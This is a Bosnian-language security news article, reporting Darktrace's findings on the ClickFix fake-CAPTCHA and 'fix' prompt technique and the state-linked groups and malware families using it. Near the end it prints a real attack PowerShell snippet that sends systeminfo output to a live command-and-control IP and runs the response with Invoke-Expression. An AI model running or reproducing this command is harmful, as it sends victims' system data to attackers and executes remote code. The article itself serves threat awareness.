Hakeri koriste novu ClickFix tehniku ​​kako bi iskoristili ljudske greške putem lažnih upita

Istraživači sajber sigurnosti identifikovali su sofisticiranu novu kampanju socijalnog inženjeringa koja iskorištava fundamentalno ljudsko povjerenje u svakodnevnim interakcijama s računarima.

Tehnika ClickFix, koja se aktivno primjenjuje od marta 2024. godine, predstavlja opasnu evoluciju u taktikama sajber kriminala koja zaobilazi tradicionalne sigurnosne mjere ciljajući najranjiviju komponentu bilo koje mreže: krajnjeg korisnika.

Ova obmanjujuća metoda se maskira kao rutinske poruke o grešci, CAPTCHA provjere ili obavještenja o održavanju sistema kako bi prevarila žrtve da izvrše zlonamjerni kod na vlastitim sistemima.

Tehnika je brzo stekla zamah u ekosistemu sajber kriminala, privlačeći pažnju pojedinačnih hakera na sofisticirane grupe Advanced Persistent Threat, uključujući APT28 i MuddyWater, organizacije povezane s ruskim, odnosno iranskim državnim interesima.

ClickFix kampanje su uspješno kompromitovale organizacije u različitim sektorima, uključujući zdravstvo, ugostiteljstvo, automobilsku industriju i vladine agencije, demonstrirajući univerzalnu primjenjivost ovog vektora napada usmjerenog na ljude.

Analitičari Darktracea identificirali su višestruke ClickFix napade u korisničkim okruženjima u Evropi, Bliskom istoku, Africi i Sjedinjenim Američkim Državama, otkrivajući globalni obim ove nove prijetnje.

Njihova istraga otkrila je sistematski pristup u kojem hakeri koriste spear phishing e-poruke, drive-by kompromitacije i iskorištavanje pouzdanih platformi poput GitHuba za isporuku malicioznog sadržaja.

Napadi obično počinju skrivenim linkovima ugrađenim u e-poruke ili malicioznim oglasima na kompromitovanim legitimnim web stranicama koje preusmjeravaju nesuđene korisnike na maliciozne URL-ove dizajnirane da se pojavljuju kao legitimni sistemski upiti.

Psihološka manipulacija svojstvena ClickFix napadima iskorištava prirodnu sklonost korisnika da rješavaju očigledne tehničke probleme.

Žrtve se susreću s uvjerljivim lažnim CAPTCHA upitima ili dijaloškim okvirima „Popravi“ koji izgledaju kao da rješavaju nepostojeće probleme poput grešaka u prikazu web stranice ili zahtjeva za registraciju uređaja.

Nakon što se aktiviraju, korisnici prolaze kroz ono što izgleda kao standardni proces verifikacije u tri koraka koji u konačnici olakšava izvršavanje malicioznih PowerShell naredbi na njihovim sistemima.

Finansijski i operativni uticaj ovih napada daleko prevazilazi početno kompromitovanje sistema.

Nakon uspješnog početnog pristupa, akteri prijetnji uspostavljaju komunikacijske kanale za komandu i kontrolu unutar ciljanih okruženja, omogućavajući lateralno kretanje kroz mreže s primarnim ciljem dobijanja i izvlačenja osjetljivih organizacijskih podataka.

Maliciozni korisni sadržaji povezani s raznim porodicama malicioznog softvera, uključujući XWorm, Lumma i AsyncRAT , često se koriste tokom ovih kampanja.

Tehnička analiza mehanizma infekcije

Tehnička sofisticiranost ClickFix napada ne leži u razvoju složenog malicioznog softvera, već u besprijekornoj integraciji društvenog inženjeringa s legitimnim sistemskim funkcijama.

Lanac napada počinje kada žrtve naiđu na pažljivo kreirane upite koji im upućuju da pritisnu Windows Key + R kako bi otvorile dijaloški okvir Run, nakon čega slijede pritisci CTRL + V za lijepljenje unaprijed učitane maliciozne PowerShell naredbe i na kraju pritisnu Enter za izvršavanje sadržaja.

Darktrace-ova istraga o konkretnom napadu od 9. aprila 2025. godine otkrila je tehničke složenosti ovog procesa.

Kompromitacija je pokrenula vanjsku komunikaciju s infrastrukturom za komandu i kontrolu, izazivajući detekciju novog korisničkog agenta PowerShell-a, što ukazuje na pokušaj udaljenog izvršavanja koda.

Detekcija numeričke datoteke, jednu minutu nakon novog upozorenja PowerShell korisničkog agenta (Izvor – DarkTrace)

Maliciozna PowerShell naredba sadržavala je sofisticirane tehnike maskiranja i konvencije imenovanja datoteka zasnovane na vremenskim oznakama.

Analiza mrežnog prometa snimljenog tokom napada otkrila je funkcionalnost PowerShell skripte putem ispitivanja hvatanja paketa.

Naredba pretvara trenutno vrijeme u Unix epoh format, kreirajući dinamički imenovane datoteke koje se pojavljuju kao bezopasni numerički nizovi.

PCAP koji ističe HTTP POST vezu s numeričkom datotekom (Izvor – DarkTrace)

Na primjer, napad je generisao datoteku pod nazivom „1744205184“ koja odgovara tačnom vremenskom žigu izvršenja, nakon čega slijedi sekundarna datoteka „1744205200“ koja sadrži podatke o izviđanju sistema.

$s=[int64](((datetime)::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffff0;
$b="193.36.38.237";
$c='IRM'; $d='POST'; $e='Invoke-Expression';
$f=$(systeminfo|out-string);
&($c) "$b`:8080/$s" -Method $d -Body $f -ContentType 'application/octet-stream'|&($e)

Ovaj PowerShell isječak demonstrira metodologiju napada, uspostavljajući varijable za ciljnu IP adresu, HTTP metode i prikupljanje sistemskih informacija prije slanja sveobuhvatnih detalja uređaja na komandni i kontrolni server na 193.36.38.237.

Ukradeni podaci uključivali su kompletne sistemske specifikacije, konfiguracije mreže, sigurnosne funkcije i detalje o hardveru, pružajući napadačima opsežne obavještajne podatke za planiranje narednih faza napada.

Izvor: CyberSecurityNews

Recent Articles

spot_img

Related Stories